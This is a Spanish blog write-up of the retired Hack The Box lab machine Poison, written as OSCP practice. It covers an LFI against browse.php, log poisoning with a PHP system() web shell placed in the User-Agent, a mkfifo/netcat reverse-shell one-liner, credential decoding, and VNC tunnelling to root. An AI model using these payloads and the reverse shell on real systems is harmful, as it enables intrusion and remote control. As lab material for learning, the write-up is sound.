<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>OSCP Path ~ Poison de Hack The Box (Necesario VIP) | Pirrandi Blog</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="OSCP Path ~ Poison de Hack The Box (Necesario VIP)" />
<meta name="author" content="Pirrandi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Writeup de la maquina de HackTheBox llamada POISON siguiendo el PATH para el OSCP" />
<meta property="og:description" content="Writeup de la maquina de HackTheBox llamada POISON siguiendo el PATH para el OSCP" />
<link rel="canonical" href="http://localhost:4000/2021/07/28/Poison.html" />
<meta property="og:url" content="http://localhost:4000/2021/07/28/Poison.html" />
<meta property="og:site_name" content="Pirrandi Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-07-28T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="OSCP Path ~ Poison de Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Pirrandi"},"dateModified":"2021-07-28T00:00:00-03:00","datePublished":"2021-07-28T00:00:00-03:00","description":"Writeup de la maquina de HackTheBox llamada POISON siguiendo el PATH para el OSCP","headline":"OSCP Path ~ Poison de Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/07/28/Poison.html"},"url":"http://localhost:4000/2021/07/28/Poison.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Pirrandi Blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pirrandi Blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Este es mi blog personal sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">OSCP Path ~ Poison de Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/OSCP/">OSCP</a>
      
      <a class="tag" href="/tag/Path,/">Path,</a>
      
      <a class="tag" href="/tag/LFI,/">LFI,</a>
      
      <a class="tag" href="/tag/RCE,/">RCE,</a>
      
      <a class="tag" href="/tag/Burpsuite,/">Burpsuite,</a>
      
      <a class="tag" href="/tag/PHP,/">PHP,</a>
      
      <a class="tag" href="/tag/RDP-file,/">RDP-file,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Writeup,/">Writeup,</a>
      
      <a class="tag" href="/tag/Hacking/">Hacking</a>
      
  </div>
  
  <div class="post-date">Published on 28 Jul 2021</div>
  
  <noscript>
    <div class="post-description">Writeup de la maquina de HackTheBox llamada POISON siguiendo el PATH para el OSCP</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="poison--hack-the-box-to-oscp">Poison ~ Hack The Box to OSCP</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 <span class="o">(</span>FreeBSD 20161230<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb <span class="o">(</span>RSA<span class="o">)</span>
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.29 <span class="o">((</span>FreeBSD<span class="o">)</span> PHP/5.6.32<span class="o">)</span>
|_http-server-header: Apache/2.4.29 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/5.6.32
|_http-title: Site doesn<span class="s1">'t have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
</span></code></pre></div></div>
<p>Lanzamos un pequeño fuzzing desde nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat WebScan </span>
<span class="c"># Nmap 7.91 scan initiated Tue Jul 27 17:45:46 2021 as: nmap --script http-enum -p80 -oN WebScan 10.10.10.84</span>
Nmap scan report <span class="k">for </span>10.10.10.84
Host is up <span class="o">(</span>0.041s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /info.php: Possible information file
|_  /phpinfo.php: Possible information file
</code></pre></div></div>
<p>Procedemos a lanzar un whatweb:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat Whatweb </span>
http://10.10.10.84:80 <span class="o">[</span>200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.4.29 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/5.6.32], IP[10.10.10.84], PHP[5.6.32], X-Powered-By[PHP/5.6.32]
</code></pre></div></div>
<p>Procedemos a hechar un vistazo a la web
 Apuntamos a la web y vemos que es una pagina para testear scrips locales,
 no introducimos nada y presionamos el enter, nos saca que pide un archivo con atraves de variable file… <code class="language-plaintext highlighter-rouge">probamos un LFI</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c"># curl -X GET "http://10.10.10.84/browse.php?file=../../../../../etc/passwd" </span>
root:<span class="k">*</span>:0:0:Charlie &amp;:/root:/bin/csh
toor:<span class="k">*</span>:0:0:Bourne-again Superuser:/root:
daemon:<span class="k">*</span>:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:<span class="k">*</span>:2:5:System &amp;:/:/usr/sbin/nologin
bin:<span class="k">*</span>:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
<span class="nb">tty</span>:<span class="k">*</span>:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:<span class="k">*</span>:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:<span class="k">*</span>:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:<span class="k">*</span>:8:8:News Subsystem:/:/usr/sbin/nologin
man:<span class="k">*</span>:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:<span class="k">*</span>:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:<span class="k">*</span>:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:<span class="k">*</span>:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
<span class="nb">bind</span>:<span class="k">*</span>:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:<span class="k">*</span>:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:<span class="k">*</span>:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:<span class="k">*</span>:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:<span class="k">*</span>:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:<span class="k">*</span>:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:<span class="k">*</span>:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:<span class="k">*</span>:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:<span class="k">*</span>:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:<span class="k">*</span>:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:<span class="k">*</span>:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:<span class="k">*</span>:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:<span class="k">*</span>:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:<span class="k">*</span>:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:<span class="k">*</span>:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:<span class="k">*</span>:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
<span class="s2">"charix:*:1001:1001:charix:/home/charix:/bin/csh"</span>
</code></pre></div></div>
<p>Enumeramos al <code class="language-plaintext highlighter-rouge">user:charix</code> y verificamos que tenemos un LFI. AHora procedemos a intentar pasasr el LFI a RCE buscando en la ruta /var/log/httpd-acces.log</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c"># curl -X GET "http://10.10.10.84/browse.php?file=/var/log/httpd-acces.log</span>
</code></pre></div></div>

<p>Procedemos a injecctar codigo PHP en el User Agent ya que tenemos acceso a la ruta <code class="language-plaintext highlighter-rouge">/var/log/httpd-access.log</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> GET /browse.php?file<span class="o">=</span>/var/log/httpd-access.log HTTP/1.1
Host: 10.10.10.84
<span class="s2">"User-Agent: &lt;?php system(</span><span class="nv">$_GET</span><span class="s2">['cmd']); ?&gt;                                              "</span>
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age<span class="o">=</span>0
</code></pre></div></div>
<p>Verificamos que en la respuesta del lado del servidor se este ejecutando nuestro codigo <code class="language-plaintext highlighter-rouge">php</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> &lt;/b&gt;:  system<span class="o">()</span>: Cannot execute a blank <span class="nb">command </span><span class="k">in</span> &lt;b&gt;/var/log/httpd-access.log &lt;/b&gt;
</code></pre></div></div>
<p>Procedemos a hacer una peticion web de la siguiente forma:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-X</span> GET <span class="s2">"10.10.10.84/browse.php?file=/var/log/httpd-access.log&amp;cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f
</span></code></pre></div></div>
<p>Y vemos que no nos funciona, asique procedemos a urlencodear el comando malicioso. Lo sustituimos en la anterior y procedemos a hacer la peticion.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">rm</span>%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.0.0.1%201234%20%3E%2Ftmp%2Ff
</code></pre></div></div>
<p>Al ganar acceso al sistema, encontramos un archivo con una cadena en base64 encodeada como 13 veces minimo:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat decryp_password_bs64             </span>
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
<span class="nv">Ukd4RVdub3dPVU5uUFQwSwo</span><span class="o">=</span>
</code></pre></div></div>
<p>Procedemos a montarnos un script para decodearlo a traves de un bucle:</p>
<pre><code class="language-python3">#!/usr/bin/python3

from base64 import b64decode

pass_en = "cadena de arriba...azVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo="

for i in range(13):
        pass_en = b64decode(pass_en)

print(pass_en)
</code></pre>
<p>Ejecutamos el script para ver el output:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># python3 decrypt.py    </span>
b<span class="s1">'Charix!2#4%6&amp;8(0'</span>
</code></pre></div></div>
<p>Creamos un archivo de credenciales:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user charix
pass Charix!2#4%6&amp;8<span class="o">(</span>0
</code></pre></div></div>
<h1 id="ganando-acceso-por-ssh">Ganando acceso por SSH</h1>
<p>Con las credenciales obtenidas procedemos a intentar conectar por el servicio SSH</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ssh charix@10.10.10.84 </span>
</code></pre></div></div>
<p>Accedemos correctamente al servicio SSH
Enumeramos el directorio home de charix y nos pasamos el archivo secret.zip a nuestra maquina</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>charix@Poison:~ % <span class="nb">ls
</span>secret.zip      user.txt
</code></pre></div></div>
<p>Sacamos la flag de <code class="language-plaintext highlighter-rouge">user.txt</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>charix@Poison:~ % <span class="nb">cat </span>user.txt 
eaacdfb2d141b72a58923xxxxxxxxxxxx
</code></pre></div></div>
<h1 id="escalada-de-privilegios">Escalada de privilegios</h1>
<p>Procedemos a enumerar el sistema como siempre</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>charix@Poison:~ % ps <span class="nt">-aux</span>
root   529   0.0  0.9  23620  8868 v0- I    08:38    0:00.02 Xvnc :1 <span class="nt">-desktop</span> X <span class="nt">-httpd</span> /usr/local/share/tightvnc/classes <span class="nt">-auth</span> /root/.Xauthority <span class="nt">-geometry</span> 1280x800 <span class="nt">-depth</span> 24 <span class="nt">-rfbwait</span> 120000 <span class="nt">-rfbauth</span> /root/.vnc/p
</code></pre></div></div>
<p>Encontramos un servicio <code class="language-plaintext highlighter-rouge">RDP de root</code>
Probamos a autenticarnos con un archivo al servicio RDP usando para ello <code class="language-plaintext highlighter-rouge">vcnviewer</code></p>

<p>Unzipeamos el secret.zip ~ nos pide passwd ~ metemos la misma paswd de charix. Obtenemos un archivo secret que pinta no ser legible</p>

<p>Procedemos a tunelizar el puerto 5901 que es el servicio RDP atraves de ssh</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-L</span> 5901:127.0.0.1:5901 charix@10.10.10.84
</code></pre></div></div>
<p>Procdemos a conectarnos al servicio RDP usando vncviewer usando un archivo como contraseña</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">"# vncviewer 127.0.0.1:5901 -passwd secret                          "</span>    
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name <span class="s2">"root's X desktop (Poison:1)"</span>
VNC server default format:
  32 bits per pixel.
  Least significant byte first <span class="k">in </span>each pixel.
  True colour: max red 255 green 255 blue 255, <span class="nb">shift </span>red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first <span class="k">in </span>each pixel.
  True colour: max red 255 green 255 blue 255, <span class="nb">shift </span>red 16 green 8 blue 0
Same machine: preferring raw encoding
</code></pre></div></div>
<p>Cnectamos correctamente y sacamos la flag de <code class="language-plaintext highlighter-rouge">root.txt</code></p>

<p>Maquina Rooteada =)</p>


</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/07/28/Poison.html';
     this.page.identifier = '/2021/07/28/Poison';
     this.page.title = 'OSCP Path ~ Poison de Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/06/27/Trick.html">
            Maquina  Retirada Trick de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/15/Attacktive-Directory.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/%2C/" class="set-1">,</a> <a href="/tag/1.8%2C/" class="set-1">1.8,</a> <a href="/tag/4.4%2C/" class="set-1">4.4,</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/adrotate%2C/" class="set-1">ADRotate,</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/autopwn%2C/" class="set-1">AutoPwn,</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bof%2C/" class="set-1">BOF,</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/blind%2C/" class="set-1">Blind,</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/bruteforce%2C/" class="set-1">Bruteforce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/curl%2C/" class="set-1">CURL,</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/command/" class="set-1">Command</a> <a href="/tag/contracts%2C/" class="set-1">Contracts,</a> <a href="/tag/cracking/" class="set-1">Cracking</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/crontabs%2C/" class="set-1">CronTabs,</a> <a href="/tag/crypto%2C/" class="set-1">Crypto,</a> <a href="/tag/curlftp%2C/" class="set-1">CurlFtp,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dockers%2C/" class="set-1">Dockers,</a> <a href="/tag/domain/" class="set-1">Domain</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/ethereum%2C/" class="set-1">Ethereum,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/execel/" class="set-1">Execel</a> <a href="/tag/exploit%2C/" class="set-1">Exploit,</a> <a href="/tag/fail2ban%2C/" class="set-1">Fail2ban,</a> <a href="/tag/file/" class="set-1">File</a> <a href="/tag/file%2C/" class="set-1">File,</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/ftp%2C/" class="set-1">Ftp,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing/" class="set-1">Fuzzing</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gitlab%2C/" class="set-1">GitLab,</a> <a href="/tag/gitbucket%2C/" class="set-1">Gitbucket,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hackthebox%2C/" class="set-1">HackTheBox,</a> <a href="/tag/hacking/" class="set-3">Hacking</a> <a href="/tag/hacking%2C/" class="set-2">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hijacking%2C/" class="set-1">Hijacking,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/ipfs%2C/" class="set-1">IPFS,</a> <a href="/tag/ipv6%2C/" class="set-1">IPV6,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/id-rsa%2C/" class="set-1">Id-Rsa,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/inclusion%2C/" class="set-1">Inclusion,</a> <a href="/tag/injection%29%2C/" class="set-1">Injection),</a> <a href="/tag/injection%2C/" class="set-1">Injection,</a> <a href="/tag/jjs%2C/" class="set-1">JJS,</a> <a href="/tag/jndi%2C/" class="set-1">JNDI,</a> <a href="/tag/joomla%2C/" class="set-1">Joomla,</a> <a href="/tag/journalctl%2C/" class="set-1">Journalctl,</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/kernel/" class="set-1">Kernel</a> <a href="/tag/knocking%2C/" class="set-1">Knocking,</a> <a href="/tag/kubernetes%2C/" class="set-1">Kubernetes,</a> <a href="/tag/ldap/" class="set-1">LDAP</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/local/" class="set-1">Local</a> <a href="/tag/log4j%2C/" class="set-1">Log4j,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/malicius/" class="set-1">Malicius</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mattermost%2C/" class="set-1">Mattermost,</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/misconfigurations%2C/" class="set-1">Misconfigurations,</a> <a href="/tag/mongo-db%2C/" class="set-1">Mongo-db,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mr.robot%2C/" class="set-1">Mr.Robot,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/nosqli%2C/" class="set-1">NoSQLI,</a> <a href="/tag/node-red%2C/" class="set-1">Node-Red,</a> <a href="/tag/nostromo/" class="set-1">Nostromo</a> <a href="/tag/os/" class="set-1">OS</a> <a href="/tag/oscp/" class="set-3">OSCP</a> <a href="/tag/osticket%2C/" class="set-1">OSTicket,</a> <a href="/tag/offensive/" class="set-1">Offensive</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path/" class="set-1">Path</a> <a href="/tag/path%2C/" class="set-3">Path,</a> <a href="/tag/pivoting%2C/" class="set-1">Pivoting,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/pods%2Fcontainer./" class="set-1">Pods/Container.</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/port/" class="set-1">Port</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portainer%2C/" class="set-1">Portainer,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/protection%2C/" class="set-1">Protection,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/python3%2C/" class="set-1">Python3,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/read%2C/" class="set-1">Read,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/revome/" class="set-1">Revome</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a 